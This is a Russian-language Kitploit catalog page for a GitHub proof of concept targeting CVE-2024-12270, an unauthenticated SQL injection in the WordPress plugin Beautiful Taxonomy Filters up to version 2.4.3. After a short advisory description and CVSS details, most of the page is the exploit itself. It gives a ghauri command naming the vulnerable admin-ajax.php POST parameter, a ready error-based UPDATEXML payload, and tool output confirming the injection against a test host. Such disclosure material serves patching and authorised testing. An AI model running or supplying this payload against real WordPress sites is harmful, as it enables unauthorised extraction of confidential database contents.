Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-12270 — Beautiful Taxonomy Filters <= 2.4.3 - Неаутентифицированная SQL-инъекция | Kitploit
Инструменты/GitHubGitHub/randomrobbiebf/cve-2024-12270
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubrandomrobbiebf/cve-2024-12270

CVE-2024-12270

Beautiful Taxonomy Filters <= 2.4.3 - Неаутентифицированная SQL-инъекция

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-12270

Beautiful Taxonomy Filters <= 2.4.3 - Неавторизованная SQL-инъекция

Описание

Плагин Beautiful taxonomy filters для WordPress уязвим к SQL-инъекции через параметр 'selects[0][term]' во всех версиях до 2.4.3 включительно из-за недостаточного экранирования предоставленного пользователем параметра и отсутствия должной подготовки существующего SQL-запроса. Это позволяет неавторизованным злоумышленникам добавлять дополнительные SQL-запросы в уже существующие запросы, что может быть использовано для извлечения конфиденциальной информации из базы данных.

Детали

  • Тип: плагин
  • Slug: beautiful-taxonomy-filters
  • Затронутая версия: 2.4.3
  • Оценка CVSS: 7.5
  • Рейтинг CVSS: Высокий
  • Вектор CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • CVE: CVE-2024-12270
  • Статус: Закрыт

POC

root@kitploit:~
ghauri -u 'https://wp-dev.ddev.site:443/wp-admin/admin-ajax.php' --data='action=update_filters_callback&selects[0][term]=1&selects[0][operator]=AND&selects[1][term]=1&selects[1][operator]=AND&nonce=d6180bd74e' --level=3 --dbms='mysql'
root@kitploit:~
[13:21:20] [INFO] POST parameter 'selects[0][term]' appears to be 'MySQL >= 5.1 AND string error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' injectable POST parameter 'selects[0][term]' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n Ghauri identified the following injection point(s) with a total of 675 HTTP(s) requests: --- Parameter: selects[0][term] (POST) Type: error-based Title: MySQL >= 5.1 AND string error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML) Payload: action=update_filters_callback&selects[0][term]=1 AND UPDATEXML(0,CONCAT_WS('(', '~','r0oth3x49','~'),0)-- wXyW&selects[0][operator]=AND&selects[1][term]=1&selects[1][operator]=AND --- [13:21:25] [INFO] testing MySQL [13:21:25] [INFO] confirming MySQL [13:21:25] [INFO] the back-end DBMS is MySQL [13:21:25] [INFO] fetched data logged to text files under '/Users/me/.ghauri/wp-dev.ddev.site' [*] ending @ 13:21:25 /2024-12-09/
Скачать инструмент